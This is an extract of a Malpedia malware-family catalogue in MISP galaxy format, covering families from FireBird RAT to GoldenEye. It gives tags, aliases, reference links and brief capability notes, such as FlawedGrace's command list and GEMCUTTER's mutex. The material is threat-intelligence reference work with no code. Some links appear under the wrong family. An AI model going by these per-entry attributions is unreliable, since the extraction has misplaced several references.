<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.fireball">https://malpedia.caad.fkie.fraunhofer.de/details/win.fireball</a></td>
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<tr>
<td><a href="http://blog.checkpoint.com/2017/06/01/fireball-chinese-malware-250-million-infection/">http://blog.checkpoint.com/2017/06/01/fireball-chinese-malware-250-million-infection/</a></td>
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</tbody>
</table>

FireBird RAT

The tag is: misp-galaxy:malpedia="FireBird RAT"

FireBird RAT is also known as:

Table 1743. Table References

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FireCrypt

The tag is: `misp-galaxy:malpedia="FireCrypt"`

FireCrypt is also known as:

Table 1744. Table References

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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.firebird_rat">https://malpedia.caad.fkie.fraunhofer.de/details/win.firebird_rat</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/casual_malware/status/123775601035096064">https://twitter.com/casual_malware/status/123775601035096064</a></td>
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FireMalv

The tag is: `misp-galaxy:malpedia="FireMalv"`

FireMalv is also known as:

Table 1745. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.firecrypt">https://malpedia.caad.fkie.fraunhofer.de/details/win.firecrypt</a></td>
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FirstRansom

The tag is: `misp-galaxy:malpedia="FirstRansom"`

FirstRansom is also known as:

Table 1746. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.first_ransom">https://malpedia.caad.fkie.fraunhofer.de/details/win.first_ransom</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/JaromirHorejsi/status/815949909648150528">https://twitter.com/JaromirHorejsi/status/815949909648150528</a></td>
</tr>
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</table>

Flame

The tag is: `misp-galaxy:malpedia="Flame"`

Flame is also known as:
**FLASHFLOOD**

FLASHFLOOD will scan inserted removable drives for targeted files, and copy those files from the removable drive to the FLASHFLOOD-infected system. FLASHFLOOD may also log or copy additional data from the victim computer, such as system information or contacts.

The tag is: **misp-galaxy:malpedia=*FLASHFLOOD***

FLASHFLOOD is also known as:

**FlawedAmmyy**

FlawedAmmyy is a well-known Remote Access Tool (RAT) attributed to criminal gang TA505 and used to get the control of target machines. The name reminds the strong link with the leaked source code of Ammyy Admin from which it took the main structure.

The tag is: **misp-galaxy:malpedia=*FlawedAmmyy***

FlawedAmmyy is also known as:
FlawedGrace

According to ProofPoint, FlawedGrace is written in C++ and can be categorized as a Remote Access Trojan (RAT). It seems to have been developed in the second half of 2017 mainly.

FlawedGrace uses a series of commands: FlawedGrace also uses a series of commands, provided below for reference:

- desktop_stat
- destroy_os
- target_download
- target_module_load
- target_module_load_external
- target_module_unload
- target_passwords
- target_rdp
- target_reboot
- target_remove
- target_script
- target_servers
- target_update
- target_upload
The tag is: `misp-galaxy:malpedia="FlawedGrace"`

FlawedGrace is also known as:

- GraceWire

### Table 1750. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/">https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/MsftSecIntel/status/1273359829390655488">https://twitter.com/MsftSecIntel/status/1273359829390655488</a></td>
</tr>
<tr>
<td><a href="https://www.msreverseengineering.com/blog/2021/3/2/an-exhaustively-analyzed-idb-for-flawedgrace">https://www.msreverseengineering.com/blog/2021/3/2/an-exhaustively-analyzed-idb-for-flawedgrace</a></td>
</tr>
<tr>
<td><a href="https://www.secureworks.com/research/threat-profiles/gold-tahoe">https://www.secureworks.com/research/threat-profiles/gold-tahoe</a></td>
</tr>
<tr>
<td><a href="https://www.msreverseengineering.com/blog/2019/1/14/a-quick-solution-to-an-ugly-reverse-engineering-problem">https://www.msreverseengineering.com/blog/2019/1/14/a-quick-solution-to-an-ugly-reverse-engineering-problem</a></td>
</tr>
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</table>

### FlexiSpy (Windows)

The tag is: `misp-galaxy:malpedia="FlexiSpy (Windows)"`

FlexiSpy (Windows) is also known as:

### Table 1751. Table References

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<th>Links</th>
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### FlokiBot

The tag is: `misp-galaxy:malpedia="FlokiBot"`

FlokiBot is also known as:

### Table 1752. Table References
FlowCloud

The tag is: misp-galaxy:malpedia="FlowCloud"

FlowCloud is also known as:

Table 1753. Table References

FlowerShop

The tag is: misp-galaxy:malpedia="FlowerShop"

FlowerShop is also known as:

Table 1754. Table References

Floxif

The tag is: misp-galaxy:malpedia="Floxif"
Fluxif is also known as:

Table 1755. Table References

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.floxif">https://malpedia.caad.fkie.fraunhofer.de/details/win.floxif</a></td>
</tr>
<tr>
<td><a href="https://www.virusbulletin.com/virusbulletin/2012/12/compromised-library">https://www.virusbulletin.com/virusbulletin/2012/12/compromised-library</a></td>
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</tbody>
</table>

Fluxihoc

Available since 2015, Fluxihoc is a versatile C++ malware capable of a variety of DDoS attacks as directed by a Command and Control server. Fluxihoc communicates with its C2 via HTTP in plain text.

The tag is: misp-galaxy:malpedia="Fluxihoc"

Fluxihoc is also known as:

Table 1756. Table References

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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.fluxihoc">https://malpedia.caad.fkie.fraunhofer.de/details/win.fluxihoc</a></td>
</tr>
<tr>
<td><a href="https://www.arbornetworks.com/blog/asert/the-fluxihoc-dynasty-a-long-standing-ddos-botnet/">https://www.arbornetworks.com/blog/asert/the-fluxihoc-dynasty-a-long-standing-ddos-botnet/</a></td>
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FlyingDutchman

The tag is: misp-galaxy:malpedia="FlyingDutchman"

FlyingDutchman is also known as:

Table 1757. Table References

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<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.flying_dutchman">https://malpedia.caad.fkie.fraunhofer.de/details/win.flying_dutchman</a></td>
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FlyStudio

The tag is: misp-galaxy:malpedia="FlyStudio"

FlyStudio is also known as:

Table 1758. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.flystudio">https://malpedia.caad.fkie.fraunhofer.de/details/win.flystudio</a></td>
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Fobber

The tag is: `misp-galaxy:malpedia="Fobber"`

Fobber is also known as:

Table 1759. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.navigator">https://malpedia.caad.fkie.fraunhofer.de/details/win.navigator</a></td>
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<td><a href="https://www.govcert.admin.ch/blog/12/analysing-a-new-ebanking-trojan-called-fobber">https://www.govcert.admin.ch/blog/12/analysing-a-new-ebanking-trojan-called-fobber</a></td>
</tr>
<tr>
<td><a href="http://blog.wizche.ch/fobber/malware/analysis/2015/08/10/fobber-encryption.html">http://blog.wizche.ch/fobber/malware/analysis/2015/08/10/fobber-encryption.html</a></td>
</tr>
<tr>
<td><a href="http://byte-atlas.blogspot.ch/2015/08/knowledge-fragment-unwrapping-fobber.html">http://byte-atlas.blogspot.ch/2015/08/knowledge-fragment-unwrapping-fobber.html</a></td>
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FONIX

The tag is: `misp-galaxy:malpedia="FONIX"`

FONIX is also known as:

Table 1760. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.fonix">https://malpedia.caad.fkie.fraunhofer.de/details/win.fonix</a></td>
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</table>

Formbook

FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.

The tag is: `misp-galaxy:malpedia="Formbook"`

Formbook is also known as:

Table 1761. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook">https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook</a></td>
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# FormerFirstRAT

The tag is: `misp-galaxy:malpedia="FormerFirstRAT"`

FormerFirstRAT is also known as:

- ffrat

**Table 1762. Table References**

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# FortuneCrypt

The tag is: `misp-galaxy:malpedia="FortuneCrypt"`

FortuneCrypt is also known as:

**Table 1763. Table References**

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.fortunecrypt">https://malpedia.caad.fkie.fraunhofer.de/details/win.fortunecrypt</a></td>
</tr>
</tbody>
</table>

# FRat

A RAT employing Node.js, Sails, and Socket.IO to collect information on a target

The tag is: `misp-galaxy:malpedia="FRat"`

FRat is also known as:

**Table 1764. Table References**

<table>
<thead>
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<tr>
<td><a href="https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/frat.md">https://github.com/jeFF0Falltrades/IoCs/blob/master/Broadbased/frat.md</a></td>
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# Freenki Loader

The tag is: `misp-galaxy:malpedia="Freenki Loader"`

Freenki Loader is also known as:
Table 1765. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.freenki">https://malpedia.caad.fkie.fraunhofer.de/details/win.freenki</a></td>
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</table>

FriedEx

The tag is: `misp-galaxy:malpedia="FriedEx"`

FriedEx is also known as:

- BitPaymer
- DoppelPaymer
- IEncrypt

Table 1766. Table References

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.friedex">https://malpedia.caad.fkie.fraunhofer.de/details/win.friedex</a></td>
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<td><a href="https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/">https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/</a></td>
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<td><a href="https://sites.temple.edu/care/ci-rw-attacks/">https://sites.temple.edu/care/ci-rw-attacks/</a></td>
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<td><a href="https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware">https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware</a></td>
</tr>
<tr>
<td><a href="https://www.youtube.com/watch?v=LUxOcpIRxmg">https://www.youtube.com/watch?v=LUxOcpIRxmg</a></td>
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FunnySwitch

The tag is: misp-galaxy:malpedia="FunnySwitch"

FunnySwitch is also known as:

Table 1767. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.funnyswitch">https://malpedia.caad.fkie.fraunhofer.de/details/win.funnyswitch</a></td>
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FunnyDream

The tag is: misp-galaxy:malpedia="FunnyDream"

FunnyDream is also known as:

Table 1768. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.funny_dream">https://malpedia.caad.fkie.fraunhofer.de/details/win.funny_dream</a></td>
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<tr>
<td><a href="https://nao-sec.org/2021/01/royal-road-redive.html">https://nao-sec.org/2021/01/royal-road-redive.html</a></td>
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</table>
**Furtim**

The tag is: `misp-galaxy:malpedia="Furtim"`

Furtim is also known as:

*Table 1769. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.furtim">https://malpedia.caad.fkie.fraunhofer.de/details/win.furtim</a></td>
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</table>

**FuxSocy**

FuxSocy has some similarities to win.cerber but is tracked as its own family for now.

The tag is: `misp-galaxy:malpedia="FuxSocy"`

FuxSocy is also known as:

*Table 1770. Table References*

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.fuxsocy">https://malpedia.caad.fkie.fraunhofer.de/details/win.fuxsocy</a></td>
</tr>
<tr>
<td><a href="http://id-ransomware.blogspot.com/2019/10/fuxsocy-encryptor-ransomware.html">http://id-ransomware.blogspot.com/2019/10/fuxsocy-encryptor-ransomware.html</a></td>
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**Gacrux**

The tag is: `misp-galaxy:malpedia="Gacrux"`

Gacrux is also known as:

*Table 1771. Table References*

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.gacrux">https://malpedia.caad.fkie.fraunhofer.de/details/win.gacrux</a></td>
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</table>

**GalaxyLoader**

GalaxyLoader is a simple .NET loader. Its name stems from the .pdb and the function naming.

It seems to make use of iplogger.com for tracking. It employed WMI to check the system for -IWbemServices::ExecQuery - SELECT * FROM Win32_Processor - IWbemServices::ExecQuery - select * from Win32_VideoController - IWbemServices::ExecQuery - SELECT * FROM
AntivirusProduct

The tag is: *misp-galaxy:malpedia="GalaxyLoader"*

GalaxyLoader is also known as:

Table 1772. Table References

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**gamapos**

The tag is: *misp-galaxy:malpedia="gamapos"*

gamapos is also known as:

- pios

Table 1773. Table References

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**Gameover DGA**

The tag is: *misp-galaxy:malpedia="Gameover DGA"*

Gameover DGA is also known as:

Table 1774. Table References

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**Gameover P2P**

Gameover ZeuS is a peer-to-peer botnet based on components from the earlier ZeuS trojan. According to a report by Symantec, Gameover Zeus has largely been used for banking fraud and distribution of the CryptoLocker ransomware. In early June 2014, the U.S. Department of Justice announced that an international inter-agency collaboration named Operation Tovar had succeeded in temporarily cutting communication between Gameover ZeuS and its command and control servers.

The tag is: *misp-galaxy:malpedia="Gameover P2P"*

Gameover P2P is also known as:
Gamotrol

The tag is: misp-galaxy:malpedia="Gamotrol"

Gamotrol is also known as:

Gandcrab

GandCrab was a Ransomware-as-a-Service (RaaS) emerged in January 28, 2018, managed by a criminal organization known to be confident and vocal, while running a rapidly evolving ransomware campaign. Through their aggressive, albeit unusual, marketing strategies and constant recruitment of affiliates, they were able to globally distribute a high volume of their malware.

In a surprising announcement on May 31, 2019, the GandCrab's operators posted on a dark web forum, announced the end of a little more than a year of ransomware operations, citing staggering
profit figures. However, if there's one thing that sets these threat actors apart from other groups, it is that they are unpredictable; so there is always the possibility that they might re-surface in one form or another.

The tag is: *misp-galaxy:malpedia=*"Gandcrab"

Gandcrab is also known as:

- GrandCrab

**Table 1777. Table References**

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab">https://malpedia.caad.fkie.fraunhofer.de/details/win.gandcrab</a></td>
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<td><a href="https://labs.bitdefender.com/2019/02/new-gandcrab-v5-1-decryptor-available-now/">https://labs.bitdefender.com/2019/02/new-gandcrab-v5-1-decryptor-available-now/</a></td>
</tr>
<tr>
<td><a href="https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html">https://blog.talosintelligence.com/2018/05/gandcrab-compromised-sites.html</a></td>
</tr>
<tr>
<td><a href="https://www.virusbulletin.com/virusbulletin/2020/01/behind-scenes-gandcrabs-operation/">https://www.virusbulletin.com/virusbulletin/2020/01/behind-scenes-gandcrabs-operation/</a></td>
</tr>
<tr>
<td><a href="https://sensorstechforum.com/killswitch-file-now-available-gandcrab-v4-1-2-ransomware/">https://sensorstechforum.com/killswitch-file-now-available-gandcrab-v4-1-2-ransomware/</a></td>
</tr>
<tr>
<td><a href="https://www.youtube.com/watch?v=LUXOcpIRxmg">https://www.youtube.com/watch?v=LUXOcpIRxmg</a></td>
</tr>
</tbody>
</table>
Gaudox

Gaudox is a http loader, written in C/C++. The author claims to have put much effort into making this bot efficient and stable. Its rootkit functionality hides it in Windows Explorer (32bit only).

The tag is: misp-galaxy:malpedia="Gaudox"
Gaudox is also known as:

Table 1778. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.gaudox">https://malpedia.caad.fkie.fraunhofer.de/details/win.gaudox</a></td>
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<tr>
<td><a href="http://nettoolz.blogspot.ch/2016/03/gaudox-http-bot-1101-casm-ring3-rootkit.html">http://nettoolz.blogspot.ch/2016/03/gaudox-http-bot-1101-casm-ring3-rootkit.html</a></td>
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Gauss

The tag is: misp-galaxy:malpedia="Gauss"

Gauss is also known as:

Table 1779. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.gauss">https://malpedia.caad.fkie.fraunhofer.de/details/win.gauss</a></td>
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Gazer

The tag is: misp-galaxy:malpedia="Gazer"

Gazer is also known as:

- WhiteBear

Table 1780. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.gazer">https://malpedia.caad.fkie.fraunhofer.de/details/win.gazer</a></td>
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<td><a href="https://securelist.com/introducing-whitebear/81638/">https://securelist.com/introducing-whitebear/81638/</a></td>
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<td><a href="https://www.youtube.com/watch?v=PvzhtjI86wc">https://www.youtube.com/watch?v=PvzhtjI86wc</a></td>
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<tr>
<td><a href="https://securelist.com/shedding-skin-turlas-fresh-faces/88069/">https://securelist.com/shedding-skin-turlas-fresh-faces/88069/</a></td>
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<tr>
<td><a href="https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/">https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/</a></td>
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<tr>
<td><a href="https://github.com/eset/malware-ioc/tree/master/turla">https://github.com/eset/malware-ioc/tree/master/turla</a></td>
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<td><a href="https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/">https://www.welivesecurity.com/2017/08/30/eset-research-cyberespionage-gazer/</a></td>
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gcman

The tag is: misp-galaxy:malpedia="gcman"
gcman is also known as:

Table 1781. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.gcman">https://malpedia.caad.fkie.fraunhofer.de/details/win.gcman</a></td>
</tr>
</tbody>
</table>

**GearInformer**

The tag is: `misp-galaxy:malpedia="GearInformer"`

GearInformer is also known as:

Table 1782. Table References

<table>
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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://wapacklabs.blogspot.ch/2017/02/rebranding-ispy-keylogger-gear-informer.html">https://wapacklabs.blogspot.ch/2017/02/rebranding-ispy-keylogger-gear-informer.html</a></td>
</tr>
</tbody>
</table>

**GEARSHIFT**

According to FireEye, GEARSHIFT is a memory-only dropper for two keylogger DLLs. It is designed to replace a legitimate Fax Service DLL.

The tag is: `misp-galaxy:malpedia="GEARSHIFT"`

GEARSHIFT is also known as:

Table 1783. Table References

<table>
<thead>
<tr>
<th>Links</th>
</tr>
</thead>
<tbody>
<tr>
<td><a href="https://content.fireeye.com/apt-41/rpt-apt41/">https://content.fireeye.com/apt-41/rpt-apt41/</a></td>
</tr>
</tbody>
</table>

**GEMCUTTER**

According to FireEye, GEMCUTTER is used in a similar capacity as BACKBEND (downloader), but maintains persistence by creating a Windows registry run key. GEMCUTTER checks for the presence of the mutex MicrosoftGMMZJ to ensure only one copy of GEMCUTTER is executing. If the mutex doesn’t exist, the malware creates it and continues execution; otherwise, the malware signals the MicrosoftGMMExit event.

The tag is: `misp-galaxy:malpedia="GEMCUTTER"`

GEMCUTTER is also known as:
Table 1784. Table References

<table>
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<th>Links</th>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.gemcutter">https://malpedia.caad.fkie.fraunhofer.de/details/win.gemcutter</a></td>
</tr>
<tr>
<td><a href="https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf">https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf</a></td>
</tr>
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Get2

The tag is: `misp-galaxy:malpedia="Get2"`

Get2 is also known as:

- FRIENDSPEAK
- GetandGo

Table 1785. Table References

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.get2">https://malpedia.caad.fkie.fraunhofer.de/details/win.get2</a></td>
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<td><a href="https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824">https://www.telekom.com/en/blog/group/article/inside-of-cl0p-s-ransomware-operation-615824</a></td>
</tr>
<tr>
<td><a href="https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/">https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/</a></td>
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<tr>
<td><a href="https://github.com/Tera0017/TAFOF-Unpacker">https://github.com/Tera0017/TAFOF-Unpacker</a></td>
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<tr>
<td><a href="https://intel471.com/blog/ta505-get2-loader-malware-december-2020/">https://intel471.com/blog/ta505-get2-loader-malware-december-2020/</a></td>
</tr>
<tr>
<td><a href="https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7">https://elis531989.medium.com/funtastic-packers-and-where-to-find-them-41429a7ef9a7</a></td>
</tr>
<tr>
<td><a href="https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/">https://blog.fox-it.com/2020/11/16/ta505-a-brief-history-of-their-time/</a></td>
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GetMail

The tag is: *misp-galaxy:malpedia*="GetMail"

GetMail is also known as:

Table 1786. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.getmail">https://malpedia.caad.fkie.fraunhofer.de/details/win.getmail</a></td>
</tr>
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GetMyPass

The tag is: *misp-galaxy:malpedia*="GetMyPass"

GetMyPass is also known as:

- getmypos

Table 1787. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.getmypass">https://malpedia.caad.fkie.fraunhofer.de/details/win.getmypass</a></td>
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get_pwd

The tag is: *misp-galaxy:malpedia*="get_pwd"

get_pwd is also known as:

Table 1788. Table References
Ghole

The tag is: `misp-galaxy:malpedia="Ghole"`

Ghole is also known as:

- CoreImpact (Modified)
- Gholee

Table 1789. Table References

<table>
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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.get_pwd">https://malpedia.caad.fkie.fraunhofer.de/details/win.get_pwd</a></td>
</tr>
<tr>
<td><a href="https://ihonker.org/thread-1504-1-1.html">https://ihonker.org/thread-1504-1-1.html</a></td>
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Gh0stnet

The tag is: `misp-galaxy:malpedia="Gh0stnet"`

Gh0stnet is also known as:

- Remosh

Table 1790. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostnet">https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostnet</a></td>
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<tr>
<td><a href="https://en.wikipedia.org/wiki/GhostNet">https://en.wikipedia.org/wiki/GhostNet</a></td>
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<td><a href="https://www.nartv.org/2019/03/28/10-years-since-ghostnet/">https://www.nartv.org/2019/03/28/10-years-since-ghostnet/</a></td>
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</table>

GhostAdmin

The tag is: `misp-galaxy:malpedia="GhostAdmin"`

GhostAdmin is also known as:

- Ghost iBot

Table 1791. Table References
Ghost RAT

The tag is: misp-galaxy:malpedia="Ghost RAT"

Ghost RAT is also known as:

- Farfli
- Gh0st RAT
- PCRat

Table 1792. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_rat">https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_rat</a></td>
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<td><a href="https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf">https://raw.githubusercontent.com/yt0ng/cracking_softcell/main/Cracking_SOFTCLL_TLP_WHITE.pdf</a></td>
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<td><a href="https://www.intezer.com/blog-chinaz-relations/">https://www.intezer.com/blog-chinaz-relations/</a></td>
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<td><a href="https://tccontre.blogspot.com/2021/02/gh0strat-anti-debugging-nested-seh-try.html">https://tccontre.blogspot.com/2021/02/gh0strat-anti-debugging-nested-seh-try.html</a></td>
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<td><a href="http://www.nartv.org/mirror/ghostnet.pdf">http://www.nartv.org/mirror/ghostnet.pdf</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/bronze-fleetwood">https://www.secureworks.com/research/threat-profiles/bronze-fleetwood</a></td>
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<td><a href="https://blog.cylance.com/the-ghost-dragon">https://blog.cylance.com/the-ghost-dragon</a></td>
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<tr>
<td><a href="https://s.tencent.com/research/report/836.html">https://s.tencent.com/research/report/836.html</a></td>
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</table>
Gibberish Ransomware

The tag is: misp-galaxy:malpedia="Gibberish Ransomware"

Gibberish Ransomware is also known as:

Table 1793. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.gibberish
### Giffy

**The tag is:** `misp-galaxy:malpedia="Giffy"`

Giffy is also known as:

**Table 1794. Table References**

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.giffy">https://malpedia.caad.fkie.fraunhofer.de/details/win.giffy</a></td>
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<td><a href="https://vx-underground.org/archive/APTs/2016/2016.09.06/Buckeye.pdf">https://vx-underground.org/archive/APTs/2016/2016.09.06/Buckeye.pdf</a></td>
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### Ginwui

**The tag is:** `misp-galaxy:malpedia="Ginwui"`

Ginwui is also known as:

**Table 1795. Table References**

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.ginwui">https://malpedia.caad.fkie.fraunhofer.de/details/win.ginwui</a></td>
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### Glasses

**The tag is:** `misp-galaxy:malpedia="Glasses"`

Glasses is also known as:

- Wordpress Bruteforcer

**Table 1796. Table References**

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.glasses">https://malpedia.caad.fkie.fraunhofer.de/details/win.glasses</a></td>
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### GlassRAT

**The tag is:** `misp-galaxy:malpedia="GlassRAT"`

GlassRAT is also known as:

**Table 1797. Table References**

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GlitchPOS

The tag is: `misp-galaxy:malpedia="GlitchPOS"`

GlitchPOS is also known as:

Table 1798. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.glitch_pos">https://malpedia.caad.fkie.fraunhofer.de/details/win.glitch_pos</a></td>
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<td><a href="https://blog.talosintelligence.com/2019/03/glitchpos-new-pos-malware-for-sale.html">https://blog.talosintelligence.com/2019/03/glitchpos-new-pos-malware-for-sale.html</a></td>
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GlobeImposter

The tag is: `misp-galaxy:malpedia="GlobeImposter"`

GlobeImposter is also known as:

Table 1799. Table References

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<tr>
<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.globeimposter">https://malpedia.caad.fkie.fraunhofer.de/details/win.globeimposter</a></td>
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<td><a href="https://blog.fortinet.com/2017/08/05/analysis-of-new-globeimposter-ransomware-variant">https://blog.fortinet.com/2017/08/05/analysis-of-new-globeimposter-ransomware-variant</a></td>
</tr>
<tr>
<td><a href="https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/">https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/</a></td>
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<td><a href="https://info.phishlabs.com/blog/globe-imposter-ransomware-makes-a-new-run">https://info.phishlabs.com/blog/globe-imposter-ransomware-makes-a-new-run</a></td>
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<td><a href="https://isc.sans.edu/diary/23417">https://isc.sans.edu/diary/23417</a></td>
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<td><a href="https://www.secureworks.com/research/threat-profiles/gold-swathmore">https://www.secureworks.com/research/threat-profiles/gold-swathmore</a></td>
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<td><a href="https://www.youtube.com/watch?v=LUXOcpIRxmg">https://www.youtube.com/watch?v=LUXOcpIRxmg</a></td>
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<tr>
<td><a href="https://blog.ensilo.com/globeimposter-ransomware-technical">https://blog.ensilo.com/globeimposter-ransomware-technical</a></td>
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Globe

The tag is: `misp-galaxy:malpedia="Globe"`

Globe is also known as:

Table 1800. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.globe_ransom">https://malpedia.caad.fkie.fraunhofer.de/details/win.globe_ransom</a></td>
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GlooxMail

The tag is: `misp-galaxy:malpedia="GlooxMail"`

GlooxMail is also known as:

Table 1801. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.glooxmail">https://malpedia.caad.fkie.fraunhofer.de/details/win.glooxmail</a></td>
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Glupteba

The tag is: `misp-galaxy:malpedia="Glupteba"`

Glupteba is also known as:

Table 1802. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba">https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba</a></td>
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<td><a href="https://www.domaintools.com/resources/blog/identifying-network-infrastructure-related-to-a-whospoofing-campaign">https://www.domaintools.com/resources/blog/identifying-network-infrastructure-related-to-a-whospoofing-campaign</a></td>
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<td><a href="http://resources.infosecinstitute.com/tdss4-part-1/">http://resources.infosecinstitute.com/tdss4-part-1/</a></td>
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GoBotKR

The tag is: `misp-galaxy:malpedia="GoBotKR"`

GoBotKR is also known as:

Table 1803. Table References

Links

- https://malpedia.caad.fkie.fraunhofer.de/details/win.gobotkr

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goCryptoLocker

The tag is: `misp-galaxy:malpedia="goCryptoLocker"`

goCryptoLocker is also known as:

Table 1804. Table References

Links

- https://malpedia.caad.fkie.fraunhofer.de/details/win.gocryptolocker
- https://id-ransomware.blogspot.com/2020/04/gocryptolocker-ransomware.html
- https://twitter.com/GrujaRS/status/1254657823478353920

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Godlike12

The tag is: `misp-galaxy:malpedia="Godlike12"`

Godlike12 is also known as:

- GOSLU

Table 1805. Table References

Links

- https://malpedia.caad.fkie.fraunhofer.de/details/win.godlike12
goDoH

Proof of concept for data exfiltration via DoH, written in Go.

The tag is: misp-galaxy:malpedia="goDoH"

goDoH is also known as:

Table 1806. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.godoh">https://malpedia.caad.fkie.fraunhofer.de/details/win.godoh</a></td>
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<tr>
<td><a href="https://sensepost.com/blog/2018/waiting-for-godoh/">https://sensepost.com/blog/2018/waiting-for-godoh/</a></td>
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<tr>
<td><a href="https://github.com/sensepost/goDoH">https://github.com/sensepost/goDoH</a></td>
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Godzilla Loader

The tag is: misp-galaxy:malpedia="Godzilla Loader"

Godzilla Loader is also known as:

Table 1807. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.godzilla_loader">https://malpedia.caad.fkie.fraunhofer.de/details/win.godzilla_loader</a></td>
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Goggles

The tag is: misp-galaxy:malpedia="Goggles"

Goggles is also known as:

Table 1808. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.goggles">https://malpedia.caad.fkie.fraunhofer.de/details/win.goggles</a></td>
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GoGoogle
The tag is: misp-galaxy:malpedia="GoGoogle"

GoGoogle is also known as:

• BossiTossi

Table 1809. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.gogoogle">https://malpedia.caad.fkie.fraunhofer.de/details/win.gogoogle</a></td>
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<td><a href="https://labs.bitdefender.com/2020/05/gogoogle-decryption-tool/">https://labs.bitdefender.com/2020/05/gogoogle-decryption-tool/</a></td>
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GoldenEye
The tag is: misp-galaxy:malpedia="GoldenEye"

GoldenEye is also known as:

• Petya/Mischa

Table 1810. Table References

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<td><a href="https://malpedia.caad.fkie.fraunhofer.de/details/win.goldeneye">https://malpedia.caad.fkie.fraunhofer.de/details/win.goldeneye</a></td>
